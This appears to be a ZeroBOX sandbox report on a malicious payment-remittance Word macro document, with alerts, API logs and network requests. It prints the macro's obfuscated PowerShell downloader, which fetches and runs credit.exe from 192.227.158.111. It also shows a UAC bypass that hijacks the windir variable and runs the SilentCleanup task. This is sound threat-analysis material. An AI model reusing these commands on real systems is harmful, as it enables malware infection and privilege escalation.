popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

JPM_Payment_Remittance_505693.docm

VBA_macro UPX Malicious Library Downloader Antivirus HTTP ScreenShot Create Service KeyLogger Internet API P2P DGA Http API FTP Socket Escalate priviledges DNS Code injection Sniff Audio Steal credential AntiDebug PE File AntiVM PE32
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 30, 2021, 11:46 a.m. July 30, 2021, 11:48 a.m.
Size 173.2KB
Type Microsoft Word 2007+
MD5 b2633a1d702957694bb470b202ba032c
SHA256 f28ecb41b3e4045639a6f85154681721d017ede8908f512508b774a28a4cda9a
CRC32 D8160187
ssdeep 3072:vBThMhPgo28+RQOLkRoz+GphFmdx6vSBlc1xOH5qgEMKWDv9BNK8x:9WhPFJ+RQOLzRph4uvSBl/HvEMxFRx
Yara
  • Contains_VBA_macro_code - Detect a MS Office document with embedded VBA macro code [binaries]

  • WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" C:\Users\test22\AppData\Local\Temp\JPM_Payment_Remittance_505693.docm

    1620

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $v78df0=(00100100,01110111,01100101,00110010,00110010,00111101,00100111,00101000,01001110,01100101,01110111,00101101,01001111,01100010,01101010,01100101,00100111,00100000,00101011,00100000,00100111,01100011,01110100,00100000,01001110,01100101,01110100,00101110,01010111,01100101,00100111,00111011,00100000,00100100,01100010,00110100,01100100,01100110,00111101,00100111,01100010,01000011,01101100,00100111,00100000,00101011,00100000,00100111,01101001,01100101,01101110,01110100,00101001,00101110,01000100,01101111,01110111,01101110,01101100,01101111,00100111,00111011,00100000,00100100,01100011,00110011,00111101,00100111,01100001,01100100,01000110,01101001,01101100,01100101,00101000,00100111,00100111,01101000,01110100,01110100,01110000,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110010,00110111,00101110,00110001,00110101,00111000,00101110,00110001,00110001,00110001,00101111,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101100,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100111,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00100111,00101001,00100111,00111011,00100100,01010100,01000011,00111101,01001001,01000101,01011000,00100000,00101000,00100100,01110111,01100101,00110010,00110010,00101100,00100100,01100010,00110100,01100100,01100110,00101100,00100100,01100011,00110011,00100000,00101101,01001010,01101111,01101001,01101110,00100000,00100111,00100111,00101001,00111011,01110011,01110100,01100001,01110010,01110100,00101101,01110000,01110010,01101111,01100011,01100101,01110011,01110011,00101000,00100100,01100101,01101110,01110110,00111010,01110100,01100101,01101101,01110000,00101011,00100000,00100111,01011100,01100011,01110010,01100101,01100100,01101001,01110100,00101110,01100101,01111000,01100101,00100111,00101001) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };[system.String]::Join('', $v78df0)|IEX

      2200

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.102:49166 -> 192.227.158.111:80 2016141 ET INFO Executable Download from dotted-quad Host A Network Trojan was detected
TCP 192.168.56.102:49169 -> 13.107.42.13:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49171 -> 13.107.42.12:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.102:49170 -> 13.107.42.12:443 906200056 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.227.158.111:80 -> 192.168.56.102:49166 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 192.227.158.111:80 -> 192.168.56.102:49166 2016538 ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download Potentially Bad Traffic
TCP 192.227.158.111:80 -> 192.168.56.102:49166 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.102:49169
13.107.42.13:443 		C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 CN=onedrive.com 24:8a:fb:ed:16:0d:11:c8:2f:65:3a:66:ca:f1:6f:60:ad:4c:cc:de
TLSv1
192.168.56.102:49171
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49
TLSv1
192.168.56.102:49170
13.107.42.12:443 		C=US, O=Microsoft Corporation, CN=Microsoft RSA TLS CA 02 C=US, ST=WA, L=Redmond, O=Microsoft Corporation, OU=Microsoft Corporation, CN=storage.live.com 77:27:91:d8:e9:91:39:0b:f9:f9:5e:86:3e:37:d5:dc:9d:85:30:49

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min C:\Users\Public\UKO.bat
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: reg
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: schtasks
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: exit
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system was unable to find the specified registry key or value.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: ERROR:
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: The system cannot find the path specified.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

 buffer: C:\Users\Public>
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: start
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: /min reg delete hkcu\Environment /v windir /f
console_handle: 0x00000007
1 1 0

WriteConsoleW

 buffer: The operation completed successfully.
console_handle: 0x00000007
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e4d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e210
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035de10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035de10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035de10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035de10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035de10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035de10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035d910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035d910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035d910
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035dfd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035e2d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035da50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0035da50
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://192.227.158.111/credit.exe
request GET http://192.227.158.111/credit.exe
request GET https://onedrive.live.com/download?cid=D6676A9A61E841F3&resid=D6676A9A61E841F3%21106&authkey=ABWUN04e3lg3neg
request GET https://zya3ig.sn.files.1drv.com/y4mhGDkKmL3VDLSUrEWHAJjnel-AVhbdeVNYyQnBqeWWrlxrQZ9NszEAsvT8XGLPe7mkz9QTC2UI2gLMghScHsnFP_Z6_KMpHHOIsKBYLdy8Z_oB67tIlMC6eqSbrKMSaRvkdLdJNSecdujzF4iBhESi-AinVSWep0qzarT4IY-QFmPWqsXK9v3smoVL9-Ky_SUCQSiGojuKkheE7LkfMcRgw/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
request GET https://zya3ig.sn.files.1drv.com/y4mOTz_QAR6NiYt2v34fuSPi5mluFwXvFkGg8tgtdufNHC3Zp9FIYVKG-COsmBXTAwBxjc8xosZ0KnX7YbZwmx2gL8VpE8j5-03OKW0BG2tczyDzTjZtpuri4UXT7gVUL5_4LtiWlB8bzeQv8EGyVBirb0QKQzgVoopEqx_2Y5-ilTcGCMR2XMNsrjj0y-XdrvdZ12IIfBEs2MBrH5lxUUseg/Boplulwvphysvkdwcittsyporhfrcui?download&psid=1
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00555000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 1620
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x69094000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 1572864
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x027b0000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x68a11000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2200
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x68a12000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02682000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02692000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026ba000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02693000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02694000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02707000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0268b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02705000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02695000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026bc000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x04b80000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02696000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0270c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b3000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b4000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b5000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b6000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b7000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b8000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x026b9000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05060000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05061000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05062000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05063000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05064000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05065000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05066000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05067000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05068000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05069000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0506a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0506b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0506c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2200
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0506d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\~$M_Payment_Remittance_505693.docm
file C:\Users\Public\UKO.bat
file C:\Users\test22\AppData\Local\Temp\credit.exe
file C:\Users\Public\KDECO.bat
file C:\Users\Public\nest.bat
file C:\Users\Public\Libraries\Boplulw\Boplulw.exe
file C:\Users\Public\Trast.bat
Time & API Arguments Status Return Repeated

NtCreateFile

